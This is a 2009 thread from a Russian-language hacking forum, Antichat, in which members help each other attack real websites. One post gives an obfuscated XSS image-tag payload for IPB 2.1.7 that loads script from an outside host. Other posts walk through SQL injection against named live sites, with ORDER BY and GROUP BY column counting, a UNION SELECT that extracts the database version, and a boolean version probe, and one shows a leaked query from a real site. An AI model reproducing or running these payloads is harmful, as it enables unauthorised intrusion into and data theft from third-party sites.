ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.01.2009, 11:50
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Не подскажите нуда XSS вставлять в этом коде?
Или путь до JS
XSS для IPB v2.1.7
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =[/snapback].gif[/img]
Если ставлю вместо
src=/http:xxdaim.ruxmonzterxforum/
вот такое
src=/http:xxhost.ruxmonzterxscriptxmonzterxjs.js/
то всё ок но после перехода по картинке (которая образованна XSS) выходит сообщение:
"Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова."
также пробовал вставить туда
Ошибка таже...
Последний раз редактировалось Byrger; 11.01.2009 в 12:14..
|
|
|
11.01.2009, 13:04
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
jokester
Молодец конечно, за старания +, но дело в том, что сейчас твой пост в следующей паре затеряется и все вопросы начнут прогонять по кругу.Одни и те же.
ЛЮДИ, читайте тему! На любой ваш вопрос здесь 99% уже есть ответ, и не один!
На банальные вопросы в скором времени вам никто отвечать не будет, будете обижаться.Включайте мозг, и платите налоги =)
|
|
|
|
11.01.2009, 13:19
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Вот вопрсоег.
http://www.electionguide.org/country-news.php?ID=208+GROUP+BY+8+-- - ошибка не выводится, значит столбцов 8.
Делаю запрос http://www.electionguide.org/country-news.php?ID=208+UNION+SELECT+1,2,3,4,5,6,7,8+--
А мне пишет:
Query Error: The used SELECT statements have a different number of columns
Как будто количество неверно...
|
|
|
|
11.01.2009, 13:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Потому что там вот такая ошибка идет:
Код:
http://www.electionguide.org/country-news.php?ID=208+order+by+10--
Query Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY news_items.news_date DESC' at line 9
SQL: SELECT news_items.id, news_title, news_date, rss_title, IF(ext_id>0, news_link, CONCAT('http://www.electionguide.org/country-news.php?ID=',country.id,'#anchor_', news_items.id)) as news_link, IF(ext_id>0, external_news.rss_title, 'ElectionGuide') as news_source, news_content, ext_id FROM news_items LEFT JOIN country on country.id=news_items.country LEFT JOIN external_news ON external_news.id=news_items.ext_id WHERE news_items.is_active=1 AND news_items.country=208 order by 10-- ORDER BY news_items.news_date DESC
LEFT JOIN, или искать уязвимость в другом месте, или фактически blind sql-inj |
|
|
|
11.01.2009, 13:26
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Используй order+by
Нет ошибки:
Код:
http://www.electionguide.org/country-news.php?ID=208+order+by+50--
Ошибка:
Код:
http://www.electionguide.org/country-news.php?ID=208+order+by+51--
Итого:
Код:
http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--
Вывод в title.
Последний раз редактировалось R1dex; 11.01.2009 в 13:31..
|
|
|
|
11.01.2009, 13:31
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
R1dex
Опередил, там два запроса, в одном 8 полей во втором 50, это вывод из 2-го
|
|
|
|
11.01.2009, 13:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
R1dex красавчег, а я в исхолники не посмотрел. +5
|
|
|
|
11.01.2009, 15:13
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Еще вопросег =)
http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
Что я делаю не так?
|
|
|
|
11.01.2009, 15:40
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от wildshaman
Еще вопросег =)
http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
Что я делаю не так?
вот что смог определить
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
5 версия мускула
|
|
|
|
11.01.2009, 15:44
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от z00MAN
вот что смог определить
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
5 версия мускула Гм, интеренсо...
А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
